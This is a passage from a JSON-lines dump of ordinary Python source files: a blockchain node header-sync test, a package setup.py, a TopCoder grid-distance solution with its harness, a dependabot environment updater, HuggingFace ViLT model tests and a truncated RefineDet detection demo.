lists to all three nodes\n node0.send_header_for_blocks(self.blocks[0:2000])\n node0.send_header_for_blocks(self.blocks[2000:])\n node1.send_header_for_blocks(self.blocks[0:2000])\n node1.send_header_for_blocks(self.blocks[2000:])\n node2.send_header_for_blocks(self.blocks[0:200])\n\n # Send 102 blocks to node0. 
Block 102 will be rejected.\n for i in range(101):\n node0.send_message(msg_block(self.blocks[i]))\n node0.sync_with_ping() # make sure the most recent block is synced\n node0.send_message(msg_block(self.blocks[101]))\n assert_equal(self.nodes[0].getblock(self.nodes[0].getbestblockhash())['height'], 101)\n\n # Send 3102 blocks to node1. All blocks will be accepted.\n for i in range(2202):\n node1.send_message(msg_block(self.blocks[i]))\n node1.sync_with_ping() # make sure the most recent block is synced\n assert_equal(self.nodes[1].getblock(self.nodes[1].getbestblockhash())['height'], 2202)\n\n # Send 102 blocks to node2. Block 102 will be rejected.\n for i in range(101):\n node2.send_message(msg_block(self.blocks[i]))\n node2.sync_with_ping() # make sure the most recent block is synced\n node2.send_message(msg_block(self.blocks[101]))\n assert_equal(self.nodes[2].getblock(self.nodes[2].getbestblockhash())['height'], 101)\n\nif __name__ == '__main__':\n SendHeadersTest().main()\n"} {"ext": "py", "sha": "1a2f94c20bfca4a4a80aa32e7f144f758c9ffa37", "content": "\nfrom setuptools import find_packages, setup\nfrom pathlib import Path\n\nthis_directory = Path(__file__).parent\nreadme = (this_directory / \"README.md\").read_text()\n\n\nsetup(\n name='sentencesimilarity',\n packages=find_packages(),\n version='0.1.1',\n description='Calculates semantic similarity between given sentences.',\n long_description= readme,\n long_description_content_type='text/markdown',\n author='osahin',\n author_email = \"oguuzhansahiin@gmail.com\",\n license='MIT',\n install_requires=['transformers==4.9.2','scikit_learn==0.24.2','torch==1.9.0'],\n setup_requires=['pytest-runner'],\n tests_require=['pytest==4.4.1'],\n test_suite='tests',\n)\n"} {"ext": "py", "sha": "1a2f94dba5ba24353eccf5534e2f85dec025ac23", "content": "# -*- coding: utf-8 -*-\nimport math,string,itertools,fractions,heapq,collections,re,array,bisect\n\nclass PublicTransit:\n\n def distRaw(self, R, C, i1, j1, i2, j2):\n # q = [(i1, j1, 0)]\n # deltas = [(1, 0), (-1, 0), (0, -1), (0, 1)]\n # while q:\n # i, j, d = q.pop(0)\n # if i == i2 and j == j2:\n # return d\n # for delta in deltas:\n # ni = i + delta[0]\n # nj = j + delta[1]\n # if 0 <= ni < R and 0 <= nj < C:\n # q.append((ni, nj, d+1))\n # return 1000\n return abs(i1-i2)+abs(j1-j2)\n\n\n\n def distAfterConnect(self, R, C, connect, i1, j1, i2, j2):\n if i1 == i2 and j1 == j2:\n return 0\n return min(self.distRaw(R, C, i1, j1, i2, j2), \\\n self.distRaw(R, C, i1, j1, connect[0], connect[1]) + self.distRaw(R, C, connect[2], connect[3], i2, j2), \\\n self.distRaw(R, C, i1, j1, connect[2], connect[3]) + self.distRaw(R, C, connect[0], connect[1], i2, j2))\n\n def maxDist(self, R, C, connect):\n res = 1\n for i1 in range(R):\n for j1 in range(C):\n for i2 in range(R-1, -1, -1):\n for j2 in range(C-1, -1, -1):\n if abs(i1-i2) + abs(j1-j2) <= res:\n continue\n res = max(res, self.distAfterConnect(R, C, connect, i1, j1, i2, j2))\n return res\n\n def minimumLongestDistance(self, R, C):\n\n if R <= 0 or C <= 0:\n return 0\n if R*C <= 2:\n return 1\n\n res = 1000\n for i1 in range(R):\n for j1 in range(C):\n for i2 in range(R):\n for j2 in range(C):\n if i1 == i2 and j1 == j2:\n continue\n # connect (i, j) and (i2, j2)\n res = min(res, self.maxDist(R, C, (i1, j1, i2, j2)))\n\n return res\n\n# CUT begin\n# TEST CODE FOR PYTHON {{{\nimport sys, time, math\n\ndef tc_equal(expected, received):\n try:\n _t = type(expected)\n received = _t(received)\n if _t == list or _t == tuple:\n if len(expected) != 
len(received): return False\n return all(tc_equal(e, r) for (e, r) in zip(expected, received))\n elif _t == float:\n eps = 1e-9\n d = abs(received - expected)\n return not math.isnan(received) and not math.isnan(expected) and d <= eps * max(1.0, abs(expected))\n else:\n return expected == received\n except:\n return False\n\ndef pretty_str(x):\n if type(x) == str:\n return '\"%s\"' % x\n elif type(x) == tuple:\n return '(%s)' % (','.join( (pretty_str(y) for y in x) ) )\n else:\n return str(x)\n\ndef do_test(R, C, __expected):\n startTime = time.time()\n instance = PublicTransit()\n exception = None\n try:\n __result = instance.minimumLongestDistance(R, C);\n except:\n import traceback\n exception = traceback.format_exc()\n elapsed = time.time() - startTime # in sec\n\n if exception is not None:\n sys.stdout.write(\"RUNTIME ERROR: \\n\")\n sys.stdout.write(exception + \"\\n\")\n return 0\n\n if tc_equal(__expected, __result):\n sys.stdout.write(\"PASSED! \" + (\"(%.3f seconds)\" % elapsed) + \"\\n\")\n return 1\n else:\n sys.stdout.write(\"FAILED! \" + (\"(%.3f seconds)\" % elapsed) + \"\\n\")\n sys.stdout.write(\" Expected: \" + pretty_str(__expected) + \"\\n\")\n sys.stdout.write(\" Received: \" + pretty_str(__result) + \"\\n\")\n return 0\n\ndef run_tests():\n sys.stdout.write(\"PublicTransit (500 Points)\\n\\n\")\n\n passed = cases = 0\n case_set = set()\n for arg in sys.argv[1:]:\n case_set.add(int(arg))\n\n with open(\"PublicTransit.sample\", \"r\") as f:\n while True:\n label = f.readline()\n if not label.startswith(\"--\"): break\n\n R = int(f.readline().rstrip())\n C = int(f.readline().rstrip())\n f.readline()\n __answer = int(f.readline().rstrip())\n\n cases += 1\n if len(case_set) > 0 and (cases - 1) in case_set: continue\n sys.stdout.write(\" Testcase #%d ... 
\" % (cases - 1))\n passed += do_test(R, C, __answer)\n\n sys.stdout.write(\"\\nPassed : %d / %d cases\\n\" % (passed, cases))\n\n T = time.time() - 1431783977\n PT, TT = (T / 60.0, 75.0)\n points = 500 * (0.3 + (0.7 * TT * TT) / (10.0 * PT * PT + TT * TT))\n sys.stdout.write(\"Time : %d minutes %d secs\\n\" % (int(T/60), T%60))\n sys.stdout.write(\"Score : %.2f points\\n\" % points)\n\nif __name__ == '__main__':\n run_tests()\n\n# }}}\n# CUT end\n"} {"ext": "py", "sha": "1a2f9570c702e00f26b1a895b9224a12e8a3d770", "content": "# coding: utf-8\n# Copyright (c) Max-Planck-Institut für Eisenforschung GmbH - Computational Materials Design (CM) Department\n# Distributed under the terms of \"New BSD License\", see the LICENSE file.\n\nimport json\nimport re\nimport sys\n\nimport yaml\n\nenvironment_file = '.ci_support/environment.yml'\nname_mapping_file = '.ci_support/pypi_vs_conda_names.json'\n\n\nclass EnvironmentUpdater:\n def __init__(self, package_name, from_version, to_version):\n \"\"\"\n Updates the version of a package in the conda environment file.\n\n Parameters:\n package_name: Name of the package to update as available on PyPI\n from_version: Version the package is before the update\n to_version: Version to which the package should be updated\n \"\"\"\n self.from_version = from_version\n self.to_version = to_version\n with open(name_mapping_file, 'r') as f:\n self._name_conversion_dict = json.load(f)\n\n with open(environment_file, 'r') as f:\n self.environment = yaml.safe_load(f)\n\n self.package_name = self._convert_package_name(package_name)\n\n def _convert_package_name(self, name):\n if name in self._name_conversion_dict.keys():\n result = self._name_conversion_dict[name]\n else:\n result = name\n return result\n\n def _update_dependencies(self):\n updated_dependencies = []\n\n for dep in self.environment['dependencies']:\n updated_dependencies.append(re.sub(\n r'(' + self.package_name + '.*)' + self.from_version,\n r'\\g<1>' + self.to_version,\n dep\n ))\n\n self.environment['dependencies'] = updated_dependencies\n\n def _write(self):\n with open(environment_file, 'w') as f:\n yaml.safe_dump(self.environment, f)\n\n def update_dependencies(self):\n \"\"\"Update the version of the requested dependency in the environment file\"\"\"\n self._update_dependencies()\n self._write()\n\n\nif len(sys.argv) != 7 or not (sys.argv[1] == 'Bump' and sys.argv[3] == 'from' and sys.argv[5] == 'to'):\n raise ValueError(f\"Title of a dependabot PR 'Bump from to ' expected, \"\n f\"but got {' '.join(sys.argv[1:])}\")\npackage_to_update = sys.argv[2]\nfrom_version = sys.argv[4]\nto_version = sys.argv[6]\n\nupdater = EnvironmentUpdater(package_to_update, from_version, to_version)\nupdater.update_dependencies()\n"} {"ext": "py", "sha": "1a2f95d0e6cd940fbc2c94792038478aa5b02563", "content": "# coding=utf-8\n# Copyright 2022 The HuggingFace Inc. team. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\" Testing suite for the PyTorch ViLT model. 
\"\"\"\n\nimport unittest\n\nfrom datasets import load_dataset\nfrom packaging import version\n\nfrom transformers import ViltConfig, is_torch_available, is_vision_available\nfrom transformers.models.auto import get_values\nfrom transformers.testing_utils import require_torch, require_vision, slow, torch_device\nfrom transformers.utils import cached_property\n\nfrom ...test_configuration_common import ConfigTester\nfrom ...test_modeling_common import ModelTesterMixin, floats_tensor, ids_tensor, random_attention_mask\n\n\nif is_torch_available():\n import torch\n\n from transformers import (\n MODEL_MAPPING,\n ViltForImageAndTextRetrieval,\n ViltForImagesAndTextClassification,\n ViltForMaskedLM,\n ViltForQuestionAnswering,\n ViltModel,\n )\n from transformers.models.vilt.modeling_vilt import VILT_PRETRAINED_MODEL_ARCHIVE_LIST\n\nif is_vision_available():\n import PIL\n from PIL import Image\n\n from transformers import ViltProcessor\n\n\nclass ViltModelTester:\n def __init__(\n self,\n parent,\n batch_size=13,\n seq_length=7,\n image_size=30,\n patch_size=2,\n num_channels=3,\n is_training=True,\n use_input_mask=True,\n use_token_type_ids=True,\n use_labels=True,\n vocab_size=99,\n hidden_size=32,\n num_hidden_layers=5,\n num_attention_heads=4,\n intermediate_size=37,\n hidden_act=\"gelu\",\n hidden_dropout_prob=0.1,\n attention_probs_dropout_prob=0.1,\n max_position_embeddings=512,\n type_vocab_size=16,\n type_sequence_label_size=2,\n initializer_range=0.02,\n num_labels=3,\n scope=None,\n modality_type_vocab_size=2,\n add_multiple_images=False,\n num_images=-1,\n ):\n self.parent = parent\n self.batch_size = batch_size\n self.seq_length = seq_length\n self.image_size = image_size\n self.patch_size = patch_size\n self.num_channels = num_channels\n self.is_training = is_training\n self.use_input_mask = use_input_mask\n self.use_token_type_ids = use_token_type_ids\n self.use_labels = use_labels\n self.vocab_size = vocab_size\n self.hidden_size = hidden_size\n self.num_hidden_layers = num_hidden_layers\n self.num_attention_heads = num_attention_heads\n self.intermediate_size = intermediate_size\n self.hidden_act = hidden_act\n self.hidden_dropout_prob = hidden_dropout_prob\n self.attention_probs_dropout_prob = attention_probs_dropout_prob\n self.max_position_embeddings = max_position_embeddings\n self.type_vocab_size = type_vocab_size\n self.type_sequence_label_size = type_sequence_label_size\n self.initializer_range = initializer_range\n self.num_labels = num_labels\n self.scope = scope\n self.modality_type_vocab_size = modality_type_vocab_size\n self.add_multiple_images = add_multiple_images\n self.num_images = num_images\n # we set the expected sequence length (which is used in several tests)\n # this is equal to the seq length of the text tokens + number of image patches + 1 for the CLS token\n self.expected_seq_len = self.seq_length + (self.image_size // self.patch_size) ** 2 + 1\n\n def prepare_config_and_inputs(self):\n input_ids = ids_tensor([self.batch_size, self.seq_length], self.vocab_size)\n if self.add_multiple_images:\n pixel_values = floats_tensor([self.batch_size, 2, self.num_channels, self.image_size, self.image_size])\n else:\n pixel_values = floats_tensor([self.batch_size, self.num_channels, self.image_size, self.image_size])\n\n input_mask = None\n if self.use_input_mask:\n input_mask = random_attention_mask([self.batch_size, self.seq_length])\n\n token_type_ids = None\n if self.use_token_type_ids:\n token_type_ids = ids_tensor([self.batch_size, self.seq_length], 
self.type_vocab_size)\n\n if self.use_labels:\n token_labels = ids_tensor([self.batch_size, self.seq_length], self.num_labels)\n\n config = self.get_config()\n\n return (config, input_ids, token_type_ids, input_mask, pixel_values, token_labels)\n\n def get_config(self):\n return ViltConfig(\n image_size=self.image_size,\n patch_size=self.patch_size,\n num_channels=self.num_channels,\n vocab_size=self.vocab_size,\n hidden_size=self.hidden_size,\n num_hidden_layers=self.num_hidden_layers,\n num_attention_heads=self.num_attention_heads,\n intermediate_size=self.intermediate_size,\n hidden_act=self.hidden_act,\n hidden_dropout_prob=self.hidden_dropout_prob,\n attention_probs_dropout_prob=self.attention_probs_dropout_prob,\n max_position_embeddings=self.max_position_embeddings,\n type_vocab_size=self.type_vocab_size,\n is_decoder=False,\n initializer_range=self.initializer_range,\n num_labels=self.num_labels,\n modality_type_vocab_size=self.modality_type_vocab_size,\n num_images=self.num_images,\n )\n\n def create_and_check_model(\n self,\n config,\n input_ids,\n token_type_ids,\n input_mask,\n pixel_values,\n token_labels,\n ):\n model = ViltModel(config=config)\n model.to(torch_device)\n model.eval()\n result = model(input_ids, attention_mask=input_mask, token_type_ids=token_type_ids, pixel_values=pixel_values)\n result = model(input_ids, token_type_ids=token_type_ids, pixel_values=pixel_values)\n result = model(input_ids, pixel_values=pixel_values)\n self.parent.assertEqual(\n result.last_hidden_state.shape, (self.batch_size, self.expected_seq_len, self.hidden_size)\n )\n\n def prepare_config_and_inputs_for_common(self):\n config_and_inputs = self.prepare_config_and_inputs()\n (\n config,\n input_ids,\n token_type_ids,\n input_mask,\n pixel_values,\n token_labels,\n ) = config_and_inputs\n inputs_dict = {\n \"input_ids\": input_ids,\n \"token_type_ids\": token_type_ids,\n \"attention_mask\": input_mask,\n \"pixel_values\": pixel_values,\n }\n return config, inputs_dict\n\n def prepare_pixel_values(self):\n return floats_tensor([self.batch_size, self.num_channels, self.image_size, self.image_size])\n\n\n@require_torch\nclass ViltModelTest(ModelTesterMixin, unittest.TestCase):\n\n all_model_classes = (\n (\n ViltModel,\n ViltForQuestionAnswering,\n ViltForImageAndTextRetrieval,\n ViltForMaskedLM,\n )\n if is_torch_available()\n else ()\n )\n test_pruning = False\n test_headmasking = False\n test_torchscript = False\n\n # ViltForMaskedLM, ViltForQuestionAnswering and ViltForImagesAndTextClassification require special treatment\n def _prepare_for_class(self, inputs_dict, model_class, return_labels=False):\n inputs_dict = super()._prepare_for_class(inputs_dict, model_class, return_labels=return_labels)\n\n # if model_class.__name__ == \"ViltForNaturalLanguageVisualReasonining\":\n # inputs_dict[\"pixel_values\"] = floats_tensor([self.model_tester.batch_size, self.model_tester.num_images, self.model_tester.num_channels, self.model_tester.image_size, self.model_tester.image_size])\n\n if return_labels:\n if model_class.__name__ == \"ViltForQuestionAnswering\":\n inputs_dict[\"labels\"] = torch.zeros(\n self.model_tester.batch_size, self.model_tester.num_labels, device=torch_device\n )\n elif model_class.__name__ == \"ViltForMaskedLM\":\n inputs_dict[\"labels\"] = torch.zeros(\n (self.model_tester.batch_size, self.model_tester.seq_length), dtype=torch.long, device=torch_device\n )\n elif model_class.__name__ == \"ViltForImagesAndTextClassification\":\n inputs_dict[\"labels\"] = torch.zeros(\n 
self.model_tester.batch_size, dtype=torch.long, device=torch_device\n )\n\n return inputs_dict\n\n def setUp(self):\n self.model_tester = ViltModelTester(self)\n self.config_tester = ConfigTester(self, config_class=ViltConfig, hidden_size=37)\n\n def test_config(self):\n self.config_tester.run_common_tests()\n\n def test_model(self):\n config_and_inputs = self.model_tester.prepare_config_and_inputs()\n self.model_tester.create_and_check_model(*config_and_inputs)\n\n def test_training(self):\n if not self.model_tester.is_training:\n return\n\n for model_class in self.all_model_classes:\n config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()\n config.return_dict = True\n\n if model_class.__name__ == \"ViltForImagesAndTextClassification\":\n config.modality_type_vocab_size = 3\n\n # ViltForImageAndTextRetrieval doesn't support training for now\n if model_class in [*get_values(MODEL_MAPPING), ViltForImageAndTextRetrieval]:\n continue\n\n model = model_class(config)\n model.to(torch_device)\n model.train()\n inputs = self._prepare_for_class(inputs_dict, model_class, return_labels=True)\n for k, v in inputs.items():\n print(k, v.shape)\n loss = model(**inputs).loss\n loss.backward()\n\n def test_training_gradient_checkpointing(self):\n if not self.model_tester.is_training:\n return\n\n for model_class in self.all_model_classes:\n config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()\n config.use_cache = False\n config.return_dict = True\n\n # ViltForImageAndTextRetrieval doesn't support training for now\n if (\n model_class in [*get_values(MODEL_MAPPING), ViltForImageAndTextRetrieval]\n or not model_class.supports_gradient_checkpointing\n ):\n continue\n\n model = model_class(config)\n model.to(torch_device)\n model.gradient_checkpointing_enable()\n model.train()\n inputs = self._prepare_for_class(inputs_dict, model_class, return_labels=True)\n loss = model(**inputs).loss\n loss.backward()\n\n @unittest.skip(\n reason=\"\"\"VilT samples image tokens from a multinomial distribution, resulting in not deterministic\n hidden states\"\"\"\n )\n def test_save_load(self):\n pass\n\n @unittest.skip(\n reason=\"\"\"VilT samples image tokens from a multinomial distribution, resulting in not deterministic\n hidden states\"\"\"\n )\n def test_determinism(self):\n pass\n\n @unittest.skip(\n reason=\"\"\"VilT samples image tokens from a multinomial distribution, resulting in not deterministic\n hidden states\"\"\"\n )\n def test_model_outputs_equivalence(self):\n pass\n\n def test_attention_outputs(self):\n config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()\n config.return_dict = True\n\n seq_len = getattr(self.model_tester, \"expected_seq_len\", None)\n\n for model_class in self.all_model_classes:\n inputs_dict[\"output_attentions\"] = True\n inputs_dict[\"output_hidden_states\"] = False\n config.return_dict = True\n model = model_class(config)\n model.to(torch_device)\n model.eval()\n with torch.no_grad():\n outputs = model(**self._prepare_for_class(inputs_dict, model_class))\n attentions = outputs.attentions\n if model_class.__name__ == \"ViltForImagesAndTextClassification\":\n # attentions are a list of length num_images\n # each element contains the attentions of a particular image index\n self.assertEqual(len(attentions), self.model_tester.num_images)\n self.assertEqual(len(attentions[0]), self.model_tester.num_hidden_layers)\n else:\n self.assertEqual(len(attentions), self.model_tester.num_hidden_layers)\n\n # check that 
output_attentions also work using config\n del inputs_dict[\"output_attentions\"]\n config.output_attentions = True\n model = model_class(config)\n model.to(torch_device)\n model.eval()\n with torch.no_grad():\n outputs = model(**self._prepare_for_class(inputs_dict, model_class))\n attentions = outputs.attentions\n if model_class.__name__ == \"ViltForImagesAndTextClassification\":\n # attentions are a list of length num_images\n # each element contains the attentions of a particular image index\n self.assertEqual(len(attentions), self.model_tester.num_images)\n self.assertEqual(len(attentions[0]), self.model_tester.num_hidden_layers)\n else:\n self.assertEqual(len(attentions), self.model_tester.num_hidden_layers)\n\n if model_class.__name__ == \"ViltForImagesAndTextClassification\":\n self.assertListEqual(\n list(attentions[0][0].shape[-3:]),\n [self.model_tester.num_attention_heads, seq_len, seq_len],\n )\n else:\n self.assertListEqual(\n list(attentions[0].shape[-3:]),\n [self.model_tester.num_attention_heads, seq_len, seq_len],\n )\n out_len = len(outputs)\n\n # Check attention is always last and order is fine\n inputs_dict[\"output_attentions\"] = True\n inputs_dict[\"output_hidden_states\"] = True\n model = model_class(config)\n model.to(torch_device)\n model.eval()\n with torch.no_grad():\n outputs = model(**self._prepare_for_class(inputs_dict, model_class))\n\n self.assertEqual(out_len + 1, len(outputs))\n\n self_attentions = outputs.encoder_attentions if config.is_encoder_decoder else outputs.attentions\n\n if model_class.__name__ == \"ViltForImagesAndTextClassification\":\n self.assertEqual(len(self_attentions), self.model_tester.num_images)\n self.assertEqual(len(self_attentions[0]), self.model_tester.num_hidden_layers)\n self.assertListEqual(\n list(self_attentions[0][0].shape[-3:]),\n [self.model_tester.num_attention_heads, seq_len, seq_len],\n )\n else:\n self.assertEqual(len(self_attentions), self.model_tester.num_hidden_layers)\n self.assertListEqual(\n list(self_attentions[0].shape[-3:]),\n [self.model_tester.num_attention_heads, seq_len, seq_len],\n )\n\n def test_hidden_states_output(self):\n def check_hidden_states_output(inputs_dict, config, model_class):\n model = model_class(config)\n model.to(torch_device)\n model.eval()\n\n with torch.no_grad():\n outputs = model(**self._prepare_for_class(inputs_dict, model_class))\n\n hidden_states = outputs.encoder_hidden_states if config.is_encoder_decoder else outputs.hidden_states\n\n expected_num_layers = getattr(\n self.model_tester, \"expected_num_hidden_layers\", self.model_tester.num_hidden_layers + 1\n )\n if model_class.__name__ == \"ViltForImagesAndTextClassification\":\n # hidden_states are a list of length num_images\n # each element contains the hidden states of a particular image index\n self.assertEqual(len(hidden_states), self.model_tester.num_images)\n self.assertEqual(len(hidden_states[0]), expected_num_layers)\n else:\n self.assertEqual(len(hidden_states), expected_num_layers)\n\n seq_length = self.model_tester.expected_seq_len\n\n if model_class.__name__ == \"ViltForImagesAndTextClassification\":\n self.assertListEqual(\n list(hidden_states[0][0].shape[-2:]),\n [seq_length, self.model_tester.hidden_size],\n )\n else:\n self.assertListEqual(\n list(hidden_states[0].shape[-2:]),\n [seq_length, self.model_tester.hidden_size],\n )\n\n config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()\n\n for model_class in self.all_model_classes:\n print(\"Model class:\", model_class)\n 
inputs_dict[\"output_hidden_states\"] = True\n check_hidden_states_output(inputs_dict, config, model_class)\n\n # check that output_hidden_states also work using config\n del inputs_dict[\"output_hidden_states\"]\n config.output_hidden_states = True\n\n check_hidden_states_output(inputs_dict, config, model_class)\n\n def test_retain_grad_hidden_states_attentions(self):\n config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()\n config.output_hidden_states = True\n config.output_attentions = True\n\n # no need to test all models as different heads yield the same functionality\n model_class = self.all_model_classes[0]\n model = model_class(config)\n model.to(torch_device)\n\n inputs = self._prepare_for_class(inputs_dict, model_class)\n\n outputs = model(**inputs)\n\n output = outputs[0]\n\n # Encoder-/Decoder-only models\n hidden_states = outputs.hidden_states[0]\n attentions = outputs.attentions[0]\n\n if model_class.__name__ == \"ViltForImagesAndTextClassification\":\n # hidden_states are a list of length num_images\n # each element contains the hidden states of a particular image index\n hidden_states[0].retain_grad()\n attentions[0].retain_grad()\n else:\n hidden_states.retain_grad()\n attentions.retain_grad()\n\n output.flatten()[0].backward(retain_graph=True)\n\n if model_class.__name__ == \"ViltForImagesAndTextClassification\":\n # hidden_states are a list of length num_images\n # each element contains the hidden states of a particular image index\n self.assertIsNotNone(hidden_states[0].grad)\n self.assertIsNotNone(attentions[0].grad)\n else:\n self.assertIsNotNone(hidden_states.grad)\n self.assertIsNotNone(attentions.grad)\n\n @slow\n def test_model_from_pretrained(self):\n for model_name in VILT_PRETRAINED_MODEL_ARCHIVE_LIST[:1]:\n model = ViltModel.from_pretrained(model_name)\n self.assertIsNotNone(model)\n\n\n@require_torch\nclass ViltForImagesAndTextClassificationModelTest(ViltModelTest, unittest.TestCase):\n\n all_model_classes = (ViltForImagesAndTextClassification,) if is_torch_available() else ()\n\n def setUp(self):\n self.model_tester = ViltModelTester(self, modality_type_vocab_size=3, add_multiple_images=True, num_images=2)\n self.config_tester = ConfigTester(self, config_class=ViltConfig, hidden_size=37)\n\n @unittest.skip(\"We only test the model that takes in multiple images\")\n def test_model(self):\n pass\n\n\n# We will verify our results on an image of cute cats\ndef prepare_img():\n image = Image.open(\"./tests/fixtures/tests_samples/COCO/000000039769.png\")\n return image\n\n\n@require_torch\n@require_vision\nclass ViltModelIntegrationTest(unittest.TestCase):\n @cached_property\n def default_processor(self):\n return ViltProcessor.from_pretrained(\"dandelin/vilt-b32-finetuned-vqa\") if is_vision_available() else None\n\n @slow\n def test_inference_masked_lm(self):\n model = ViltForMaskedLM.from_pretrained(\"dandelin/vilt-b32-mlm\").to(torch_device)\n\n processor = self.default_processor\n image = prepare_img()\n text = \"a bunch of [MASK] laying on a [MASK].\"\n inputs = processor(image, text, return_tensors=\"pt\").to(torch_device)\n\n # forward pass\n with torch.no_grad():\n outputs = model(**inputs)\n\n # verify the logits\n expected_shape = torch.Size([1, 11, 30522])\n self.assertEqual(outputs.logits.shape, expected_shape)\n\n expected_slice = torch.tensor([-12.5061, -12.5123, -12.5174]).to(torch_device)\n self.assertTrue(torch.allclose(outputs.logits[0, 0, :3], expected_slice, atol=1e-4))\n\n # verify masked token prediction equals 
\"cats\"\n predicted_id = outputs.logits[0, 4, :].argmax(-1).item()\n assert processor.decode([predicted_id]) == \"cats\"\n\n @slow\n def test_inference_visual_question_answering(self):\n model = ViltForQuestionAnswering.from_pretrained(\"dandelin/vilt-b32-finetuned-vqa\").to(torch_device)\n\n processor = self.default_processor\n image = prepare_img()\n text = \"How many cats are there?\"\n inputs = processor(image, text, return_tensors=\"pt\").to(torch_device)\n\n # forward pass\n with torch.no_grad():\n outputs = model(**inputs)\n\n # verify the logits\n expected_shape = torch.Size((1, 3129))\n self.assertEqual(outputs.logits.shape, expected_shape)\n\n expected_slice = torch.tensor([-15.9495, -18.1472, -10.3041]).to(torch_device)\n\n self.assertTrue(torch.allclose(outputs.logits[0, :3], expected_slice, atol=1e-4))\n\n # compute loss\n vqa_labels = [[2, 3, 155, 800]]\n vqa_scores = [[1.0, 0.3, 0.3, 0.3]]\n labels = torch.zeros(1, model.config.num_labels).to(torch_device)\n\n for i, (labels_example, scores_example) in enumerate(zip(vqa_labels, vqa_scores)):\n for l, s in zip(labels_example, scores_example):\n labels[i, l] = s\n\n # forward pass\n outputs = model(**inputs, labels=labels)\n\n # verify we have a positive loss\n self.assertTrue(outputs.loss > 0)\n\n @slow\n def test_inference_natural_language_visual_reasoning(self):\n model = ViltForImagesAndTextClassification.from_pretrained(\"dandelin/vilt-b32-finetuned-nlvr2\").to(\n torch_device\n )\n\n processor = self.default_processor\n\n dataset = load_dataset(\"hf-internal-testing/fixtures_nlvr2\", split=\"test\")\n image1 = Image.open(dataset[0][\"file\"]).convert(\"RGB\")\n image2 = Image.open(dataset[1][\"file\"]).convert(\"RGB\")\n\n text = (\n \"The left image contains twice the number of dogs as the right image, and at least two dogs in total are\"\n \" standing.\"\n )\n encoding_1 = processor(image1, text, return_tensors=\"pt\")\n encoding_2 = processor(image2, text, return_tensors=\"pt\")\n\n pixel_values = torch.stack([encoding_1.pixel_values, encoding_2.pixel_values], dim=1)\n\n # forward pass\n outputs = model(\n input_ids=encoding_1.input_ids.to(torch_device),\n pixel_values=pixel_values.to(torch_device),\n )\n\n # verify the logits\n expected_shape = torch.Size([1, 2])\n self.assertEqual(outputs.logits.shape, expected_shape)\n\n is_pillow_less_than_9 = version.parse(PIL.__version__) < version.parse(\"9.0.0\")\n\n if is_pillow_less_than_9:\n expected_slice = torch.tensor(\n [-2.4013, 2.9342],\n device=torch_device,\n )\n else:\n expected_slice = torch.tensor(\n [-2.3713, 2.9168],\n device=torch_device,\n )\n\n self.assertTrue(torch.allclose(outputs.logits[0, :3], expected_slice, atol=1e-4))\n"} {"ext": "py", "sha": "1a2f967b054e32f7b45c3c4250d576604c6a17e5", "content": "import os\nimport sys\nmodule_path = os.path.abspath(os.path.join('../models/'))\nprint(module_path)\nif module_path not in sys.path:\n sys.path.append(module_path)\n\nimport torch\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nfrom torch.autograd import Variable\nimport numpy as np\nimport cv2\nimport time\n\nif torch.cuda.is_available():\n torch.set_default_tensor_type('torch.cuda.FloatTensor')\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\nsize = 320\n# from refinedet import build_refinedet\n# from models.multitrident_refinedet_v2 import build_multitridentrefinedet\nfrom models.multitrident_refinedet import build_multitridentrefinedet\nnet = build_multitridentrefinedet('test', size, 21) # initialize SSD\n# net = build_refinedet('test', 
512, 21)\n# net.load_weights('../weights/RefineDet512_VOC_final.pth')\n# net.load_weights('../weights/experiment/320*320/exp_4_[256relufpn][0.3_0.6][mAP_0.77][dilate:11111-12333-12555]/RefineDet320_VOC_275000.pth')\nnet.load_weights('../weights/experiment/320*320/RefineDet320_VOC_315000.pth')\n\n\"\"\"000210 000111 000144 009539 009589 000069 009539 001275 002333 002338 002341 \n002695 002713 003681 003874 003673 003740\"\"\"\nim_names = \"002695.jpg\"\n\n\nimage_file = '/home/yiling/data/VOCdevkit/VOC2007/JPEGImages/' + im_names\nimage = cv2.imread(image_file, cv2.IMREAD_COLOR) # uncomment if dataset not download\n#%matplotlib inline\nfrom matplotlib import pyplot as plt\nfrom data import VOCDetection, VOC_ROOT, VOCAnnotationTransform\n# here we specify year (07 or 12) and dataset ('test', 'val', 'train')\ntestset = VOCDetection(VOC_ROOT, [('2007', 'val')], None, VOCAnnotationTransform())\nimg_id = 62\n# image = testset.pull_image(img_id)\nrgb_image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n# View the sampled input image before transform\nplt.figure(figsize=(10,10))\n# plt.imshow(rgb_image)\n# plt.show()\n\nx = cv2.resize(image, (size, size)).astype(np.float32)\nx -= (104.0, 117.0, 123.0)\nx = x.astype(np.float32)\nx = x[:, :, ::-1].copy()\n# plt.imshow(x)\nx = torch.from_numpy(x).permute(2, 0, 1)\n\n\nxx = Variable(x.unsqueeze(0)) # wrap tensor in Variable\nif torch.cuda.is_available():\n xx = xx.cuda()\nstart = time.time()\ny = net(xx)\nend = time.time()\nprint(end-start)\n\nfrom data import VOC_CLASSES as labels\ntop_k=100\n\nplt.figure(figsize=(10,10))\ncolors = plt.cm.hsv(np.linspace(0, 1, 21)).tolist()\nplt.imshow(rgb_image) # plot the image for matplotlib\ncurrentAxis = plt.gca()\n\n\ndetections = y.data\n\n\n# scale each detection back up to the image\nscale = torch.Tensor(rgb_image.shape[1::-1]).repeat(2)\nfor i in range(detections.size(1)):\n for j in range(detections.size(2)):\n if detections[0,i,j,0] > 0.05:\n score = detections[0, i, j, 0]\n label_name = labels[i - 1]\n display_txt = '%s: %.2f' % (label_name, score)\n pt = (detections[0, i, j, 1:] * scale).cpu().numpy()\n coords = (pt[0], 